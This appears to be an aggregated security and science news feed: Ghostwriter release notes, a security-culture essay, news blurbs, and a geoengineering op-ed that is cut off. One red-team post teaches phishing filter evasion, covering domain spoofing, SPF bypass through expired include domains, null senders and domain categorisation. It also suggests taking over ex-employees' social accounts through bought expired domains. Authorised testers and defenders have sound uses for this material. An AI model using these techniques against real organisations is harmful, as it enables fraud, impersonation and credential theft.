The middle bullet will repeat for each finding to create our list. It includes the title and severity and uses the regex_search filter to pull the first sentence of the finding’s description. The use of severity_rt here is also worth a call-out. Some community members asked about nesting rich text fields inside of other rich text fields, like the pre-formatted severity_rt text for a finding. Not only can we use severity_rt inside this field, but we can also add formatting, like changing the text to bold.

Here is the above list rendered in a Word document. The pre-formatted finding.severity_rt appears with the proper color formatting and the bold formatting added in the WYSIWYG editor.

Output of the Jinja2 Loop in Microsoft Word

These additions introduced some complexity. A typo or syntax mistake could break the Jinja2 templating and prevent a report from generating, and the resulting error message wasn’t always helpful for tracking down the offending line of text. To help with this, Ghostwriter v4.2 validates your Jinja2 when you save your work, so you don’t need to worry about accidentally saving any invalid Jinja2 and causing a headache later on.

Validating the Jinja2 didn’t cover every possible issue, though. Even valid Jinja2 can fail to render if the report data causes an error (e.g., trying to divide by zero or referencing a non-existent value). To help with that, we significantly improved error handling to catch Jinja2 syntax and template errors at render time and surface more helpful information about them. When content prevents a report from generating, error messages point to the report’s section containing the problem.

In this example, a field called exec_summ contains this Jinja2 statement: {{ 100/0 }}. That’s valid Jinja2, but you can’t actually divide by zero, so rendering will always fail. With Ghostwriter v4.2’s error handling enhancements, the error message will direct us to the field name and include information we can use to track down the problem.

New Explicit Error Message for a Failed Report

More Reporting Improvements

Ghostwriter v4.2 also includes enhancements to the reporting engine. The most significant change is the introduction of project documents. You don’t always need to generate a full report with findings. You may need to generate other project-related documents before or after the assessment is done, like rules of engagement, statement of work, or attestation of testing documents. You could technically do this with older versions of Ghostwriter by generating a report with a different template, but that was not intuitive.

The project dashboard’s Reports tab is now called Reporting and contains an option to generate JSON, docx, or pptx reports with your project’s data. This works like the reports you’re familiar with but uses only the project data (e.g., no findings or report-specific values).

New Project Document Generation Under the Project Dashboard

We wanted to make it easier to generate project documents like this because custom fields open up many possibilities. For example, at SpecterOps, we provide clients with daily status reports after each day of testing. We can accomplish this task with a Daily Status Report field added to projects and the new project reporting feature. Consultants can now easily collaborate on updates to the daily status and then generate their daily status document from the same dashboard.

That’s not all, though. We realized one globally configured report filename would never apply to every possible document or report you might want to generate, so we made some changes. The biggest change is that your filename can now be configured using Jinja2-style templating with access to your project data, familiar filters, and a few additional values (e.g., `now` to include the current date and time). That means you can configure a filename like this that dynamically includes information about your project, client, and more:

{{now|format_datetime(“Y-m-d”)}} {{company_name}} — {{client.name}} {{project.project_type}} Report

That template would produce a filename like 2024–06–05 Acme Corp — SpecterOps Red Team Report.docx. That’s great for a default, but you’d probably be renaming documents often as you expanded the types of documents generated with Ghostwriter. To help with that, we made it possible to configure separate global defaults for reports and project documents.

Jinja2 Templating for Default Filenames for Report Downloads

We also added the option to override the filename per template! To revisit the daily status report example, your Word template for such a report can override the global filename template with a filename template like {{now|format_datetime(“Y-m-d”)}} {{company_name}} Daily Status Report.

Another enhancement for this feature is a third template type, Project DOCX. You can use this to flag Microsoft Word templates that are intended only for project documents. Templates flagged with this type will only appear in the dropdown menu on the project dashboard. This will keep them out of the list of templates for your reports.

Finally, Ghostwriter v4.2 also includes a feature proposed by community member Dominic Whewell, support for templating the document properties in your Word templates. If you set values like the document title, author(s), and company, you can now do that in your templates and let Ghostwriter fill in that information for you.

Jinja2 Templating in Document Properties

Background Tasks with Cron

Ghostwriter v4.2 also contains various bug fixes and quality-of-life improvements. There are too many details here, but one worth mentioning is support for cron expressions with scheduled background tasks. Previously, you could schedule tasks to run at certain time intervals, but you couldn’t control some of the finer points, like the day of the week.

You can now use cron to schedule a task on a more refined schedule, like only on a specific day of the week or weekdays. When scheduling a task, select Cron for the Schedule Type and provide a cron expression–e.g., 00 12 * * 1–5 to run the task every weekday at 12:00.

Using Cron to Schedule a Background Task

Check out the full CHANGELOG for all the details on this release.

Release Ghostwriter v4.2.0 · GhostManager/Ghostwriter


Ghostwriter v4.2 was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post Ghostwriter v4.2 appeared first on Security Boulevard.

Building a Culture of Cybersecurity: Why Awareness and Training Matter

security culture

By Sithembile (Nkosi) Songo, Chief Information Security Officer, ESKOM  According to the Ultimate List of Cybersecurity Statistics, 98% of cyber attacks rely on social engineering. Social engineering and phishing attacks tactics keep on evolving and targeting a diversified audience form executives to normal employees. Advanced phishing attacks that can be launched using GEN AI. There is also a shift in motivation behind these attacks, such as financial gain, curiosity or data theft.   Recent attacks have shown that cyber criminals continue to use various social engineering tricks, exploiting human weaknesses. Attackers are evolving from only exploiting technology vulnerabilities such as using automated exploits to initiate fraudulent transactions, steal data, install malware and engage in other malicious activities.  Furthermore, it is a well-documented fact that people are deemed to be the weakest link in the cybersecurity chain. Traditional security controls put more focus on the technical vulnerabilities as opposed to the human related vulnerabilities. Threat actors are transitioning from traditional system and or technology related cyber-attacks to human based attacks. The cyber criminals have identified and are now taking advantage of uninformed or untrained workforce by exploiting the human related vulnerabilities.  Employees often make it too easy by posting a huge amount of information about themselves, including daily status, activities, hobbies, travel schedule and their network of family and friends.   Even small snippets of information can be aggregated together. Bad guys can build an entire record on their targets.  Employees, especially those that are targeted, should limit what they post.  Bad guys leverage on other weaknesses, such as the improper destruction of information through dumpster diving and unencrypted data. The three most common delivery methods are email attachments, websites and USB removable media.  Properly implemented USB policies and trained users can identify, stop and report phishing attacks.  Well-educated workforces on all the different methods of social engineering attacks are more likely to identify and stop the delivery of these attacks.  While malicious breaches are the most common, inadvertent breaches from human error and system glitches are still the root cause for most of the data breaches studied in the report. Human error as a root cause of a breach includes “inadvertent insiders” who may be compromised by phishing attacks or have their devices infected or lost/stolen  Entrenching a security conscious culture is therefore extremely important in today’s digital age. Cyber awareness is of utmost importance in today’s digital age.  

What is "Security Culture"?  

Security culture is the set of values shared by all the employees in an organization, which determine how people are expected to perceive and approach security. It is the ideas, customs and social behaviours of an organization that influence its security. Security culture is the most crucial element in an organization’s security strategy as it is fundamental to its ability to protect information, data and employee and customer privacy. Perception about cybersecurity has a direct impact to the security culture. It could be either positive or negative. It’s deemed to be positive if information security is seen as a business enabler and viewed as a shared responsibility instead of becoming the CISO’s sole responsibility. On other hand it’s perceived negatively if security viewed a hindrance or a showstopper to business or production. A sustainable security culture requires care and feeding. It is not something that develops naturally, it requires nurturing,  relevant investments. It is bigger than just ad-hoc events. When a security culture is sustainable, it transforms security from ad-hoc events into a lifecycle that generates security returns forever. Security culture determines what happens with security when people are on their own. Do they make the right choices when faced with whether to click on a link? Do they know the steps that must be performed to ensure that a new product or offering is secure throughout the development life cycle.  Security culture should be engaging and delivering value because people are always keen to participate in a security culture that is co-created and enjoyable.  Furthermore, for people to invest their time and effort, they need to understand what they will get in return. In other words, it should provide a return on investment, such as improving a business solution, mitigating risks associated with cyber breaches.   Culture change can either be driven from the top or be a bottom-up approach, depending on the composition and culture of the organization. A bottom-up approach rollout allows engaged parties to feel they are defining the way forward rather than participating in a large prescriptive corporate program, while support from the top helps to validate the change, regardless of how it is delivered.   In particular, a top-down mandate helps to break down barriers between various business functions, information security, information technology, development team, operations, as well as being one of the few ways to reach beyond the technical teams and extend throughout the business. Organizations that have a Strong Cybersecurity culture have the following:  
  • Senior leadership support from Board and Exco that echo the importance of cybersecurity within the organization. 
  • Defined a security awareness strategy and programme, including the Key Performance Indicators (KPIs). 
  • Targeted awareness campaigns which segment staff based on risk. Grouping users by risk allows for messages and the frequency of messages to be tailored to the user group.  
  • A cybersecurity champion programme which allows for a group of users embedded in the organization to drive the security message. 
  • Usage of various of mediums to accommodate different types of people who learn differently. 
  • Employees are always encouraged to report cybersecurity incidents and they know where and how and to report incidents. 
  • Creating an organizational culture where people are encouraged to report mistakes could be the difference between containing a cyber incident or not. 
  • Measurements to test effectiveness: This is often done with phishing simulations.  
  • Employees have a clear understanding of what acceptable vs what is not acceptable.  
  • Information security becomes a shared responsibility instead of  CISO’s sole responsibility. 

The below image depicts percentage of adopted awareness capabilities 

Security architecture principles such as Defence in Depth, the failure of a single component of the security architecture should not compromise the security of the entire system. A defense-in-depth mechanism should be applied to mitigate phishing related risks. This approach applies security in different layers of protection, which implies that if one control fails the next layers of controls will be able to block or stop the phishing attack. The controls involve a combination of people, processes and technologies.  User behavior analytics (UBA) should be used to augment the awareness programme by detecting insider threats, targeted attacks, and financial fraud and track users’ activities. Advanced our phishing attack simulations by using GEN AI based simulations should also be conducted to combat advanced phishing attacks

Possible Measurements 

There are several measures that can be applied to measure the level of a  security conscious culture: 
  • Employees attitudes towards security protocols and issues. 
  • Behaviour and actions of employees that have direct and indirect  security implications. 
  • Employees understanding, knowledge and awareness of security issues and activities. 
  • How communication channels promote a sense of belonging and offer support related to security issues and incident reporting. 
  • Employee knowledge, support and compliance to security policies, standards and procedures. 
  • Knowledge and adherence to unwritten rules of conduct related to security. 
  • How employees perceive their responsibilities as a critical success factor in mitigating cyber risks. 

Conclusion 

According to Gartner, by 2025, 40% of cybersecurity programs will deploy socio-behavioural principles (such as nudge techniques ) to influence security culture across the organization.   Recent human based cyber-attacks, together AI enabled phishing attacks, make it imperative to tighten human based controls. Promoting a security conscious culture will play a fundamental role in transforming people from being the weakest into the strongest link in the cybersecurity chain.  Building a cybersecurity culture is crucial because it ensures that everyone understands the importance of cybersecurity, adherence to the relevant information security policies and procedures, increase the level of vigilance and mitigate risks associated with data breaches. Furthermore a strong cybersecurity culture fosters better collaboration, accountability and improved security maturity. Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express. Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything.

Microsoft Recall is a Privacy Disaster

6 June 2024 at 13:20
Microsoft CEO Satya Nadella, with superimposed text: “Security”

It remembers everything you do on your PC. Security experts are raging at Redmond to recall Recall.

The post Microsoft Recall is a Privacy Disaster appeared first on Security Boulevard.

Alameda Ends Cloud-Brightening Test, Overruling Staff Decision

The City Council in Alameda, Calif., voted to stop tests of a device that could one day cool the Earth. Scientists and city staff had previously concluded the tests posed no risk.

The sprayer being tested at the end of March in advance of the experiment on board the decommissioned U.S.S. Hornet in Alameda, Calif.

One Phish Two Phish, Red Teams Spew Phish

4 June 2024 at 13:52

PHISHING SCHOOL

How to Give your Phishing Domains a Reputation Boost

“Armed with the foreknowledge of my own death, I knew the giant couldn’t kill me. All the same, I preferred to keep my bones unbroken” — Big Phish

When we send out our phishing emails, we are reckoning with giants. Spamhaus, SpamAssassin, SpamTitan, Barracuda, and many more giants wish to grind your bones to bake their bread. They are big. They are scary. But they don’t catch everything. Just like Edward Bloom learned; the best way to deal with giants is to make a good first impression.

What’s your name, giant? — Karl

That’s how we will deal with these giants as well. Let’s talk about proper etiquette when speaking with giants.

“He Ate My Dog”

The first opportunity a mail server has to reject your email is right at the beginning of an SMTP exchange. The server can run checks on the reputation of both your sending IP, and the domain you are claiming to be in your FROM address. In general, the main controls that will get you blocked by a good secure email gateway (SEG) are some version of the following:

  • Does your sending IP show up on a known SPAM list like Spamhaus?
  • Is the geographical location of the sending IP in another country?
  • What’s the reputation/category of the sending domain?
  • What’s the age of the sending domain?
  • Does SPF fail?
He ate my dog

Of course, all of these checks are generally configurable, and not every SEG will perform all of these checks. These are just some of the most common controls I tend to expect are the root cause of a failure at this stage in the phish’s lifecycle. None of these is really all that difficult to address/bypass so by taking them into account, we can usually ensure our phishing campaigns are not blocked at this layer.

Bypassing Sender Reputation Checks

When we attempt to deliver our message, we will be connecting to a mail server for the target email’s domain, telling it who we are and who we want to send a message to, and then giving it the contents of the message. Here is an example of what that conversation looks like under the hood with data we control in blue and server responses in green:

SMTP Greetings

In general, IP address blocks are easy for us to troubleshoot because if our sending IP is blocked, the server will typically just terminate the TCP connection and we won’t even be able to start this SMTP call and response. It’s pretty rare to be blocked by IP right off the bat, and typically means you’re sending from an IP that is associated with sending a lot of SPAM, or the GeoIP result for your sending IP is in a blocked country or region. If that’s the case, just try sending from another IP.

The next opportunity for the server to block us is by the reputation of the domain we supply as the sending domain. Notice in our example that the sending domain is ‘contoso.com’ and is used in both the EHLO and MAIL FROM commands. These domains typically match, but they don’t have to. Feel free to tinker with mismatching these values to see how different mail servers respond.

You can think of the EHLO and MAIL FROM commands as saying “I’m a mail server for contoso.com, and I’m going to send an email from chris@contoso.com to one of your users”. At this point, the receiving server has an opportunity to accept or reject our claim by checking a few things:

  • Is contoso.com on a known SPAM list? (never going to let it through)
  • Is contoso.com explicitly whitelisted? (always going to let it through)
  • How old is the contoso.com domain?
  • Is contoso.com categorized? And if so, what category is it?
  • Has the server ever received emails from contoso.com before?
  • Does contoso.com’s MX record match your sending IP address?
  • Does a reverse DNS lookup of your sending IP resolve to <something>.contoso.com?
  • Does contoso.com publish an SPF record that includes your sending IP address?

Most mail servers will perform one or more of these checks to obtain hints about whether you can be trusted or not. Some of these hints, like reverse DNS records, will increase our reputation if they pass the check, but won’t really hurt our reputation too much if they fail. Others, like trying to spoof a domain from an IP that is not in that domain’s SPF record, will likely get us burned right away. Therefore, we should try to pass as many of these checks as we can, while avoiding techniques that could be clearly identified as a spoof.

So, Which Domain Should I Use?

When choosing our sending domain, we have a few options, each with its own pros and cons. We can either spoof a domain that we do not own, or buy a domain. If we buy a domain, we can either get a brand new domain of our choosing, or buy an expired domain that was previously bought by someone else. No one method is inherently better than the others, but we should have a clear understanding of how to get the most out of each technique when making our choice.

Spoofed Domains

Pros

  • Free! ‘Nough said
  • Makes attribution difficult. You are basically framing someone else. (Note: this could be a con if you have to go through attribution and deconfliction with the blue team)
  • Probably already categorized and old enough to pass checks for newly registered domains
  • Successful spoofs can look very legitimate, and therefore boost success rates

Cons

  • Limited to existing domains that you can find
  • You may be able to use non-existent domains, but they are easy to identify and often blocked. It’s generally better to purchase in this case.
  • Most high-value domains have implemented email security settings like SPF that could make it difficult, if not impossible to spoof without detection
  • We can’t set up our own email security settings on the domain that might boost our reputation (no control and no proof-of-ownership)
  • We have no influence over domain category or reputation

Considerations When Spoofing Domains

Does our target mail server actually check SPF?

If not, we should be able to successfully spoof just about any domain. I’ve seen several cases where, for whatever reason, SPF checks were either turned off or misconfigured so that failing SPF did not result in rejected emails. It’s often worth a shot to try to deliver a few benign emails while intentionally failing SPF to see if the server sends back an error message or says it delivered them. While you won’t receive any bounce messages or responses from recipients (those would go to the mail server for your spoofed domain), you could try putting image links or tags for remote CSS resources in the emails that point to a web server you own and track requests for these resources as potential indicators that the emails were delivered.

Is there a similar registered domain that lacks an SPF record?

You may be able to find domains that have been registered that look very similar to your target organization’s domain, but have not been configured with any email security settings that would allow a mail server to confirm or deny a spoof attempt. In some cases, I’ve seen clients that buy up domains similar to their own to prevent typosquatting, but then forget to apply email settings to prevent spoofing. In other cases, I’ve seen opportunistic domain squatters who buy look-alike domains in case they may become valuable, and don’t bother to set up any DNS records for their domains. In either case, we can potentially spoof these domains and the mail server will have no way of knowing we don’t own them. While this might mean we are starting off with a generally low trust score, most mail servers will not outright reject messages just because the sending domain lacks a properly configured SPF record. That is because there are so many legitimate organizations that have never bothered to set one up.

Does your target organization have an expired domain listed in an ‘include’ statement in their SPF record?

Let’s say our target organization’s email domain is fabrikam.com, and we would like to spoof an internal email address (bigboss@fabrikam.com) while sending to our target users. Consider that fabrikam.com has the following SPF record as an example:

v=spf1 mx a ip4:12.34.45.56/28 include:sendgrid.net include:imexpired.net -all

This SPF record lists the hosts/IPs that are allowed to send emails from frabrikam.com. Here is a breakdown of what each piece means:

v=spf1

This is an SPF version 1 TXT record. Used to distinguish SPF from other TXT records.

mx

The IP of the domain’s MX (mail server) record is trusted to send emails from fabrikam.com

a

the IP from doing a forward DNS lookup on the domain itself is also trusted

ip4:12.34.45.56/28

Any IP in this small range is trusted to send emails from fabrikam.com

include:sendgrid.net

any IPs or IP ranges listed in sendgrid.net’s SPF record are also trusted

include:imexpired.net

any IPs or IP ranges listed in imexpired.net’s SPF record are also trusted

-all

every other sending IP that was not listed in the previous directives is explicitly denied from sending emails claiming to be from fabrikam.com

As this demonstration shows, the ‘include’ directive in SPF allows you to trust other domains to send on your domain’s behalf. For example, emailing services like sendgrid can be configured to pass SPF checks so that sendgrid can deliver marketing emails from fabrikam.com to their customers. In the case of our example, if our client previously trusted imexpired.net to send emails, but the domain is now expired, it means we buy imexpired.net and add our own server to imexpired.net’s SPF record. We will then be able to pass SPF checks for fabrikam.com and spoof internal users.

Can we bypass SPF protections with other technical tricks?

Depending on the receiving mail server’s configuration, there may be other ways we can spoof domains that we do not own. For example, some email servers do not require SPF alignment. This means that we can have a mismatch between the domain we specify in the ‘MAIL FROM’ SMTP command, and the ‘From’ field in the message content itself. In these cases, we can use either a domain we own and can pass SPF for, or any domain without an SPF record in the ‘SMTP FROM’ command and then choose any other domain for the email address that our target user sees in their mail client. Another trick we can sometimes use is to supply what’s known as the “null sender”. To do this, we simply specify “<>” as the sender. The null sender is used for bounce messages and is sometimes allowed by spam filters for troubleshooting.

SMTP is a purely text-based protocol. This means that there is often ambiguity in determining the beginning and end of each section of data and SMTP implementations often have parsing flaws that can be abused to bypass security features like SPF and DKIM. In 2020, Chen Jianjun et. al published a whitepaper demonstrating 18 separate such flaws they discovered and that affected even some big email providers like Google:

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-You-Have-No-Idea-Who-Sent-That-Email-18-Attacks-On-Email-Sender-Authentication.pdf

https://www.usenix.org/system/files/sec20fall_chen-jianjun_prepub_0.pdf

They also published the tool they used to discover these vulnerabilities, as well as their research methodology. While they disclosed these vulnerabilities to the vendors they tested, they did not test every major SEG for all of these vulnerabilities, and you might find that some popular SEGs are still vulnerable ;)

In 2023, Marcello Salvati demonstrated a flaw in a popular email sending service that allowed anyone to pass SPF for millions of legitimate domains.

https://www.youtube.com/watch?v=NwnT15q_PS8

His DefCon talk on the subject demonstrates his research and discovery process as well. I know that there are similar flaws in some other major email sending services, but I will not be throwing them under the bus in this post. Happy hunting!

Purchasing Brand New Domains

Pros

  • We can set up SPF, DMARC, DKIM to ensure we pass these checks
  • We control the MX record so we can receive mail at this domain
  • More granular creative control over the name

Cons

  • May take some time to build a reputation before sending a campaign

Purchasing Expired Domains

Pros

  • We can set up SPF, DMARC, DKIM and ensure we pass these checks
  • We control the MX record so we can receive mail at this domain
  • More likely to already be categorized
  • You may have wayback machine results to help keep the current category
  • You might salvage some freebee social media accounts

Cons

  • Little control over the domain name. You can get key words but otherwise just have to get lucky on which ones become available

Considerations for any Purchased Domain

The two major advantages to using domains we own for phishing is that we can specify the mail server and mail security settings for the domain. This means that we can actually have back-and-forth conversations with phishing targets if we need to. This opens up the possibility for more individualized pretexts. By setting up our own SPF, DMARC, and DKIM records, we can ensure that we pass these checks to give our emails a high probability of passing reputation based checks.

The third benefit of owning a domain is that we can control more factors that might help us categorize the domain. Email gateways, web proxies, and DNS security appliances will often crawl new domains to determine what kind of content is posted on the domain’s main website if one exists. They then make a determination of whether to block or allow requests for that domain based on the type of site it is. Security products that include category checks like this are often configurable. For example, some organizations block social media sites while others allow employees to use social media at work. In general, most network administrators will allow certain common benign categories. A couple classic desirable categories for red teamers are ‘healthcare’ and ‘finance’. These categories have additional benefits when used for command and control (C2) traffic, though for the purposes of delivering emails, we really just need to be categorized as anything that’s not sketchy. If your domain is not categorized at all, or in a ‘bad’ category, then your campaign will be dead in the water, so here’s some tips on getting off the naughty list.

Categorizing New Domains

.US.ORG Domains

One of my favorite shortcuts for domain categorization is to register domains off the ‘us.org’ or similar top levels. Because ‘us.org’ is a domain registrar, its Bluecoat category is ‘Web Hosting’, and has been around for many years. The minute you buy one of these domains, you are automatically going to be lumped in a generally benign and frequently allowed category.

Categorize with HumbleChameleon

While Humble Chameleon (HC) was designed to bypass multi-factor authentication on phishing assessments, it also has some great features for ‘hiding behind’ benign domains. You can set HC’s ‘primary_target’ option to point at a site you would like to mimic and let the transparent proxy do the rest.

Warning: any time your domain is crawled, your server will be forwarding traffic to the impersonated site. I have seen logs on my server before where someone was scanning my site for WordPress vulnerabilities, and therefore causing my server to send the same malicious traffic to the site I was impersonating. While the chances of being sued for this are pretty low, please be aware that this technique may put you in a bit of a gray area. Choose targets wisely and keep good logs.

Categorizing with Clones and Nginx/Apache

If you’ve never used httrack to clone a site, you should really do yourself a favor and explore this absolute classic! How classic you ask? Xavier Roche first released this website cloner back in 1998 and it’s still a great utility for quickly cloning a site. Httrack saves website resources in a directory structure that is ideal for hosting with a static Nginx or Apache web server. The whole setup process can be easily scripted with Ansible to stand up clones for domain categorization.

Categorizing with Chatgpt and S3

The more modern version of static site hosting is to ask an AI bot to write your website for you, and then serve the static content using cheap cloud services like S3 buckets and content delivery networks. If you get stuck, or don’t know how to automate this process, you can just ask the robot ;)

Categorizing Expired Domains

Whenever you purchase an expired domain, you should go ahead and check its category before you buy. It’s much easier to maintain a good category than to try to re-categorize a domain, so only buy it if it’s already in a benign category. Once you buy one, you have two options to maintain the category. You can either generate some new content or re-host the site’s old content. If you want to generate new content, the AI route is probably the most efficient. However, my preferred approach is to just put the content of the old site back up on the Internet. If that content was what got the original categorization, then it should also keep it in the same category.

Categorizing with Wayback

If the expired domain you just purchased was indexed by the Wayback Machine, then you can download the old pages with a simple Ruby script:

https://github.com/hartator/wayback-machine-downloader

This script is insanely easy to install and use, and will generally get you a nice static site clone within minutes when paired with Nginx, Apache, etc. Keep in mind that you may want to manually modify site content that might still be under copyright or trademark from the prior owner.

Social Media Account Bonus

For expired sites you’ve bought, have you ever set up a mail server and monitored for incoming emails? I have! And the results can be fascinating. What you might find is that the domain you just bought used to belong to a functioning company, and some of that company’s employees used their work email to sign up for services like social media sites. Now, the company went under, those employees don’t have access to their former work email, but you do. Once again, I need to stress that this is a legal gray area, so do what you can to give these people back their accounts, and change PII on any others you decide to keep as catphish accounts.

General Tips for any Domain

Send Some ‘Safe’ Emails First

Some SEGs will block emails from domains they have never seen before regardless of reputation. Therefore, it’s generally a good idea to send some completely benign emails with your new domain before you send out any phishing pretexts. You can address these to the ‘info@’ or similar generic mailboxes and keep the messages vague to hopefully go unnoticed/ignored by any humans on the other end. We’re just trying to prime the SEG to make a determination that emails from our domain are safe and should be allowed in the future. I’ve also heard that adding hidden links to emails with HREFs that point to your domain will also work against some SEGs, though I have not personally experimented with this technique.

Use Sendgrid, MailChimp, etc.

These services specialize in mass email delivery for their clients. They work tirelessly to keep their email servers off of block lists and help marketers deliver phishing campaigns… ahem I mean ‘advertisements’ to their targets… oops I mean ‘leads’. Once again, marketing tools are your friend when cold emailing. Keep in mind that these services don’t appreciate scammers and spammers like you, so don’t be surprised if you get too aggressive with your phishing and your account gets blocked. Yet another argument for keeping campaigns small and targeted.

Use your Registrar’s Email Service

Most domain registrars also offer hosting and email services. Some even provide a few mailboxes for free! Similar to email sending services, your registrar’s mail servers will often be delivering tons of legitimate messages for other customers and therefore have a good reputation from an IP perspective. If you take this route, be sure to let the registrar know that you are a penetration tester and which domains you will be using for what campaigns. Most I’ve worked with have an abuse email address and will honor your use case.

Use Gmail for the Long Con

Personal emails are often a blind spot for corporate email filters. Completely blocking inbound emails from Gmail, Yahoo, Outlook, etc. is a tough pill to swallow and most network administrators decide to allow them instead of answering constant requests from employees to put in an exception for this or that sender. In addition, it’s extremely difficult to apply reputation scores to individual senders. Therefore, if you can think of a pretext that would make sense to come from a Gmail account, you have a high probability of at least bypassing domain reputation checks. This can work really well for individualized campaigns where you actually have a back-and-forth conversation with the targets before link/payload delivery.

Set Up SPF, DKIM, and DMARC

For sending domains you own, it will always work in your favor to set up email security settings. Check the API documentation for your registrar and write a script to set these DNS settings.

Read the Logs!

When you do start sending emails with a domain, make sure to watch your SMTP logs carefully. They are often extremely helpful for identifying if your messages are being blocked for reasons you control. For example, I know Mimecast will frequently block emails from new senders that it hasn’t seen before, but will respond with a very helpful message explaining how to get off their ‘gray list’. The solution is simply to resend the email within the next 24 hours. If you aren’t watching the logs, you would be blocked when you could easily deliver your email.

Parting Wisdom

“What I recalled of Sunday School was that the more difficult something became, the more rewarding it was in the end.” — Big Phish


One Phish Two Phish, Red Teams Spew Phish was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post One Phish Two Phish, Red Teams Spew Phish appeared first on Security Boulevard.

Transplanted Pig Kidney Is Removed From Patient

4 June 2024 at 13:41
The organ, from a genetically modified animal, failed because of a lack of blood flow, surgeons said, but did not appear to have been rejected by the body.

© Shelby Lum/Associated Press

Lisa Pisano looked at photos of her dog after receiving a pig kidney transplant at the NYU Langone Health in New York in April.

Using Scary but Fun Stories to Aid Cybersecurity Training – Source: securityboulevard.com

using-scary-but-fun-stories-to-aid-cybersecurity-training-–-source:-securityboulevard.com

Source: securityboulevard.com – Author: Steve Winterfeld Security experts have many fun arguments about our field. For example, while I believe War Games is the best hacker movie, opinions vary based on age and generation. Other never-ending debates include what the best hack is, the best operating system (though this is more of a religious debate), […]

La entrada Using Scary but Fun Stories to Aid Cybersecurity Training – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com

black-basta-ransomware-attack:-microsoft-quick-assist-flaw-–-source:-securityboulevard.com

Source: securityboulevard.com – Author: Wajahat Raja Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details […]

La entrada Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Alameda Officials Stop Cloud Brightening Study Aimed at Cooling Planet

14 May 2024 at 06:30
Researchers had been testing a sprayer that could one day be used to push a salty mist skyward, cooling the Earth. Officials stopped the work, citing health questions.

© Ian C. Bates for The New York Times

The experiment, designed to test possible cloud-brightening technology, took place aboard a ship docked in San Francisco Bay.

Why new proposals to restrict geoengineering are misguided

23 April 2024 at 06:00

The public debate over whether we should consider intentionally altering the climate system is heating up, as the dangers of climate instability rise and more groups look to study technologies that could cool the planet.

Such interventions, commonly known as solar geoengineering, may include releasing sulfur dioxide in the stratosphere to cast away more sunlight, or spraying salt particles along coastlines to create denser, more reflective marine clouds.  

The growing interest in studying the potential of these tools, particularly through small-scale outdoor experiments, has triggered corresponding calls to shut down the research field, or at least to restrict it more tightly. But such rules would halt or hinder scientific exploration of technologies that could save lives and ease suffering as global warming accelerates—and they might also be far harder to define and implement than their proponents appreciate.

Earlier this month, Tennessee’s governor signed into law a bill banning the “intentional injection, release, or dispersion” of chemicals into the atmosphere for the “express purpose of affecting temperature, weather, or the intensity of the sunlight.” The legislation seems to have been primarily motivated by debunked conspiracy theories about chemtrails. 

Meanwhile, at the March meeting of the United Nations Environmental Agency, a bloc of African nations called for a resolution that would establish a moratorium, if not a ban, on all geoengineering activities, including outdoor tests. Mexican officials have also proposed restrictions on experiments within their boundaries.

To be clear, I’m not a disinterested observer but a climate researcher focused on solar geoengineering and coordinating international modeling studies on the issue. As I stated in a letter I coauthored last year, I believe that it’s important to conduct more research on these technologies because it might significantly reduce certain climatic risks. 

This doesn’t mean I support unilateral efforts today, or forging ahead in this space without broader societal engagement and consent. But some of these proposed restrictions on solar geoengineering leave vague what would constitute an acceptable, “small” test as opposed to an unacceptable “intervention.” Such vagueness is problematic, and its potential consequences would have far more reach than the well-intentioned proponents of regulation might wish for.

Consider the “intentional” standard of the Tennessee bill. While it is true that the intentionality of any such effort matters, defining it is tough. If knowing that an activity will affect the atmosphere is enough for it to be considered geoengineering, even driving a car—since you know its emissions warm up the climate—could fall under the banner. Or, to pick an example operating on a much larger scale, a utility might run afoul of the bill, since operating a power plant produces both carbon dioxide that warms up the planet and sulfur dioxide pollution that can exert a cooling effect.

Indeed, a single coal-fired plant can pump out more than 40,000 tons of the latter gas a year, dwarfing the few kilograms proposed for some stratospheric experiments. That includes the Harvard project recently scrapped in light of concerns from environmental and Indigenous groups. 

Of course, one might say that in all those other cases, the climate-altering impact of emissions is only a side effect of another activity (going somewhere, producing energy, having fun). But then, outdoor tests of solar geoengineering can be framed as efforts to gain further knowledge for societal or scientific benefit. More stringent regulations suggest that, of all intentional activities, it is those focused on knowledge-seeking that need to be subjected to the highest scrutiny—while joyrides, international flights, or bitcoin mining are all fine.

There could be similar challenges even with more modest proposals to require greater transparency around geoengineering research. In a submission to federal officials in March, a group of scholars suggested, among other sensible updates, that any group proposing to conduct outdoor research on weather modification anywhere in the world should have to notify the National Oceanic and Atmospheric Administration in advance.

But creating a standard that would require notifications from anyone, anywhere who “foreseeably or intentionally seeks to cause effects within the United States” could be taken to mean that nations can’t modify any kind of emissions (or convert forests to farmland) before consulting with other countries. For instance, in 2020, the International Maritime Organization introduced rules that cut sulfate emissions from the shipping sector by more than 80%, all at once. The benefits for air quality and human health are pretty clear, but research also suggested that the change would unmask additional global warming, because such pollution can reflect away sunlight either directly or by producing clouds. Would this qualify?

It is worth noting that both those clamoring for more regulations and those bristling to just go out and “do something” claim to have, as their guiding principle, a genuine concern for the climate and human welfare. But again, this does not necessarily justify a “Ban first—ask questions later” approach,  just as it doesn’t justify “Do something first—ask permission later.” 

Those demanding bans are right in saying that there are risks in geoengineering. Those include potential side effects in certain parts of the world—possibilities that need to be better studied—as well as vexing questions about how the technology could be fairly and responsibly governed in a fractured world that’s full of competing interests.

The more recent entrance of venture-backed companies into the field, selling dubious cooling credits or playing up their “proprietary particles,” certainly isn’t helping its reputation with a public that’s rightly wary of how profit motives could influence the use of technologies with the power to alter the entire planet’s climate. Nor is the risk that rogue actors will take it upon themselves to carry out these sorts of interventions. 

